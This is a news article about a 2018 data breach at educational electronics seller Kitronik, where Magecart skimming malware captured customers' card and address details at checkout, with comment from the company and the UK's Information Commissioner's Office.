BBC micro:bit vendor Kitronik says customers' deets nicked, fingers Magecart malware

We're one of 7,000 victims here, firm insists

Educational electronics outlet Kitronik has suffered a data breach which its data controller suspects was caused by the same strain of malware that ransacked British Airways' website.

In an email seen by The Register, Kitronik's Geoff Hampson told customers that the Magecart spyware had been operating on the gadget shop's website over August and September.

"Anyone that has followed the news in recent months will be aware of the malicious software ‘Magecart’ that has been recording customer’s key presses on such high profile websites as British Airways and Ticketmaster. The malicious software records key presses at the checkout stage, to capture sensitive details. From some point early in August until mid-September the same malicious software has been present on the Kitronik website," he wrote.

Kitronik's website runs the open-source Magento e-commerce platform, which has been periodically targeted by mischief-makers.

As reported previously on El Reg, Magecart works by planting Javascript onto the payment pages of websites that use embedded third-party components. That JS then beams data entered by site users back to a server controlled by the criminals.

Details exposed in the infection on Kitronik's website included customers' names, email addresses, card numbers, expiry dates, CVV (verification) codes and cardholders' postal addresses – everything a fraudster would need to start making online purchases.

"We think that it is only details entered at the checkout stage that might have been taken and as a result, customers that had set up an account prior to August would not have had their address details stolen," continued Hampson's email. He also speculated that schools and businesses that had credit facilities were "not likely" to have been affected, adding:

Although we have a mechanism in place to alert us if the code on the website changes, this attack was very sophisticated and bypassed that code by making changes to the website database. The companies that take card payments on our behalf monitor trends and it was the payment gateway provider that notified us of a higher than normal amount of fraud, which triggered our investigation.

When contacted for comment by The Register, Hampson did not say how many customers had been affected, nor did he confirm whether the Information Commissioner's Office had been informed. Section 67 of the Data Protection Act 2018 (implementing Article 33 of the EU's GDPR) makes it a legal requirement that the watchdog be informed within 72 hours of an organisation becoming aware of a data breach "where feasible".

Among other things, Kitronik focuses on selling accessories for the BBC micro:bit proto-puter, designed as a teaching tool to get schoolkids interested in coding.

Infosec researcher Willem de Groot has a blog post with precise details of how the latest strain of Magecart exploits zero-days, while a closely related malware strain, Magentocore, infected 7,000 sites, according to him.

An ICO spokesperson said: "We are aware of an incident involving Kitronik and we will be making enquiries." ®




Biting the hand that feeds IT © 1998–2018